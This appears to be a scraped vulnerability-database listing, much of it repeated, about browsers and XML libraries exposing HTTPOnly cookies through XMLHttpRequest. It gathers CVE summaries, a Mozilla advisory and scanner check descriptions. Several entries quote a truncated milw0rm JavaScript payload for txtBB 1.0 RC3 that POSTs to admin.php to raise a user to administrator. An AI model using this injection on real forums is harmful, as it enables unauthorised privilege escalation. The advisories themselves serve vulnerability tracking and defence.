Design/Logic Flaw

xml/XMLHttpRequest.cpp in WebCore in WebKit before r38566 does not properly restrict access from web pages to the 1 Set-Cookie and 2 Set-Cookie2 HTTP response headers, which allows remote attackers to obtain sensitive information from cookies via XMLHttpRequest calls, related to the HTTPOnly...

CVE-2008-6059

xml/XMLHttpRequest.cpp in WebCore in WebKit before r38566 does not properly restrict access from web pages to the 1 Set-Cookie and 2 Set-Cookie2 HTTP response headers, which allows remote attackers to obtain sensitive information from cookies via XMLHttpRequest calls, related to the HTTPOnly...

CVE-2008-6059

xml/XMLHttpRequest.cpp in WebCore in WebKit before r38566 does not properly restrict access from web pages to the 1 Set-Cookie and 2 Set-Cookie2 HTTP response headers, which allows remote attackers to obtain sensitive information from cookies via XMLHttpRequest calls, related to the HTTPOnly...

Mozilla Foundation Security Advisory 2009-05

Mozilla Foundation Security Advisory 2009-05 Title: XMLHttpRequest allows reading HTTPOnly cookies Impact: Low Announced: February 3, 2009 Reporter: Wladimir Palant Products: Firefox, SeaMonkey Fixed in: Firefox 3.0.6 SeaMonkey 1.1.15 Description Developer and Mozilla community member Wladimir...

CVE-2008-6059

CVE-2008-6059 affects WebKit’s WebCore (XMLHttpRequest.cpp) prior to r38566. The vulnerability allows remote attackers to read cookie data via XMLHttpRequest by not properly restricting web-page access to the Set-Cookie and Set-Cookie2 response headers, related to HTTPOnly protections. Impact is ...

Google Chrome Multiple Vulnerabilities (Feb-09)

This host is installed with Google Chrome and is prone to multiple vulnerabilities. OpenVAS Vulnerability Test $Id: gbgooglechromemultvuln.nasl 4869 2016-12-29 11:01:45Z teissa $ Google Chrome Multiple Vulnerabilities Feb-09 Authors: Sujit Ghosal Copyright: Copyright c 2009 Greenbone Networks Gmb...

Google Chrome Multiple Vulnerabilities (Feb 2009)

Google Chrome is prone to multiple vulnerabilities. SPDX-FileCopyrightText: 2009 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

txtBB 1.0 RC3 - HTMLJS Injection Arbitrary Add Admin Privileges

txtBB 1.0 RC3 - HTMLJS Injection Arbitrary Add Admin Privileges var req = new XMLHttpRequest; req.open'POST', 'admin.php?action=users&type=edit&login=USERNICK&save=1', false; req.setRequestHeader'Content-Type', 'application/x-www-form-urlencoded';...

txtBB 1.0 RC3 Injection

var req = new XMLHttpRequest; req.open'POST', 'admin.php?action=users&type=edit&login=USERNICK&save=1', false; req.setRequestHeader'Content-Type', 'application/x-www-form-urlencoded'; req.send'signature=&avatar=&type=3&password=&submit=Zapisz';...

CVE-2008-6059

xml/XMLHttpRequest.cpp in WebCore in WebKit before r38566 does not properly restrict access from web pages to the 1 Set-Cookie and 2 Set-Cookie2 HTTP response headers, which allows remote attackers to obtain sensitive information from cookies via XMLHttpRequest calls, related to the HTTPOnly...

txtBB 1.0 RC3 - HTML/JS Injection / Arbitrary Add Admin Privileges

var req = new XMLHttpRequest; req.open'POST', 'admin.php?action=users&type=edit&login=USERNICK&save=1', false; req.setRequestHeader'Content-Type', 'application/x-www-form-urlencoded'; req.send'signature=&avatar=&type=3&password=&submit=Zapisz'; milw0rm.com 2009-02-05...

CVE-2009-0357

Mozilla Firefox before 3.0.6 and SeaMonkey before 1.1.15 do not properly restrict access from web pages to the 1 Set-Cookie and 2 Set-Cookie2 HTTP response headers, which allows remote attackers to obtain sensitive information from cookies via XMLHttpRequest calls, related to the HTTPOnly...

Design/Logic Flaw

Microsoft XML Core Services, as used in Microsoft Expression Web, Office, Internet Explorer 6 and 7, and other products, does not properly restrict access from web pages to Set-Cookie2 HTTP response headers, which allows remote attackers to obtain sensitive information from cookies via...

CVE-2009-0419

Microsoft XML Core Services, as used in Microsoft Expression Web, Office, Internet Explorer 6 and 7, and other products, does not properly restrict access from web pages to Set-Cookie2 HTTP response headers, which allows remote attackers to obtain sensitive information from cookies via...

CVE-2009-0357

CVE-2009-0357 affects Mozilla Firefox (before 3.0.6) and SeaMonkey (before 1.1.15). The vulnerability stems from not properly restricting access from web pages to the Set-Cookie/Set-Cookie2 HTTP response headers, allowing an attacker to read cookie data via XMLHttpRequest calls and potentially ex...

Firefox 3.0.x < 3.0.6 Multiple Vulnerabilities

The installed version of Firefox 3.0.x is earlier than 3.0.6. Such versions are potentially affected by the following security issues : - There are several stability bugs in the browser engine that could lead to crashes with evidence of memory corruption. MFSA 2009-01 - A chrome XBL method can be...

CVE-2009-0357

Mozilla Firefox before 3.0.6 and SeaMonkey before 1.1.15 do not properly restrict access from web pages to the 1 Set-Cookie and 2 Set-Cookie2 HTTP response headers, which allows remote attackers to obtain sensitive information from cookies via XMLHttpRequest calls, related to the HTTPOnly...

firefox -- multiple vulnerabilities

Mozilla Foundation reports: MFSA 2009-06: Directives to not cache pages ignored MFSA 2009-05: XMLHttpRequest allows reading HTTPOnly cookies MFSA 2009-04: Chrome privilege escalation via local .desktop files MFSA 2009-03: Local file stealing with SessionStore MFSA 2009-02: XSS using a chrome XBL...

CVE-2009-0411

Google Chrome before 1.0.154.46 does not properly restrict access from web pages to the 1 Set-Cookie and 2 Set-Cookie2 HTTP response headers, which allows remote attackers to obtain sensitive information from cookies via XMLHttpRequest calls and other web script...

CVE-2009-0411

Google Chrome before 1.0.154.46 does not properly restrict access from web pages to the 1 Set-Cookie and 2 Set-Cookie2 HTTP response headers, which allows remote attackers to obtain sensitive information from cookies via XMLHttpRequest calls and other web script...